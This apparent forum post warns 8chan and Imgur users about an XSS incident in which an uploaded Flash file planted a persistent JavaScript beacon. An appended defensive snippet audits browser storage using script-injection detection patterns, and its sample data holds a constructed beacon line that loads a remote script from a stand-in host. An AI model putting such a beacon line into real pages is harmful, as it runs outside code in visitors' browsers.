8chan XSS/imgur breach



Anyone who uses 8Chan or Imgur may want to check this out:

Here is a pastebin with a lot of info on what is happening, and details about it:


And here is something that should help you stay safe: http://www.ghacks.net/2015/02/05/how-to-clear-web-storage-in-your-browser-of-choice/

And here is the gist of what is going on exactly:

Exploits XSS on 8ch via Flash (arbitrary SWFs are uploadable and accessible through 8ch.net root domain). SWF places a persistent JS beacon on all 8ch pages to wait for further JS to run, as issued by a server, though no payload has been seen yet from the server. XSS is spreading to likely users of 8ch by compromising imgur through unknown means, and loading the SWF in certain imgur submissions (4chan screenshots). No DDoS, no attempt to exploit recent Flash CVEs (yet).
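A way to see what an origin is keeping in Web Storage before clearing it, as an added example that is not part of the original post. It assumes the persistent beacon described above is stored in Web Storage (the post does not say where it lives; the linked ghacks article covers clearing that storage), and the patterns, key names and sample values are constructed for illustration.

```javascript
// Added example. The patterns are generic heuristics chosen for illustration,
// not indicators taken from the incident.
const SCRIPT_LIKE = [
  /<script\b/i,
  /createElement\s*\(\s*["']script/i,
  /\beval\s*\(/,
  /\bnew\s+Function\s*\(/,
  /\.swf\b/i,
];

// List every entry in a Storage object and flag values that look like code.
function auditStorage(storage) {
  const findings = [];
  for (let i = 0; i < storage.length; i++) {
    const key = storage.key(i);
    const value = String(storage.getItem(key));
    const hits = SCRIPT_LIKE.filter((re) => re.test(value)).map((re) => re.source);
    findings.push({ key, chars: value.length, suspicious: hits.length > 0, hits });
  }
  return findings;
}

// Remove only the flagged entries; returns the keys that were deleted.
function purgeSuspicious(storage) {
  const keys = auditStorage(storage).filter((f) => f.suspicious).map((f) => f.key);
  keys.forEach((k) => storage.removeItem(k));
  return keys;
}

// In-memory stand-in for localStorage so the example runs outside a browser.
function makeMemoryStorage(initial) {
  const m = new Map(Object.entries(initial));
  return {
    get length() { return m.size; },
    key: (i) => Array.from(m.keys())[i] ?? null,
    getItem: (k) => (m.has(k) ? m.get(k) : null),
    removeItem: (k) => { m.delete(k); },
  };
}

// Constructed sample data (hypothetical keys and values).
const sample = makeMemoryStorage({
  theme: "dark",
  favorites: '["tech","b"]',
  constructed_beacon: 'var s=document.createElement("script");s.src="https://example.invalid/x.js";',
});
console.log(auditStorage(sample));
```

In a browser console on the site in question, the same functions accept `localStorage` and `sessionStorage` directly.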


I was reading a lot about this earlier today. Imgur was saying they would fix it ASAP.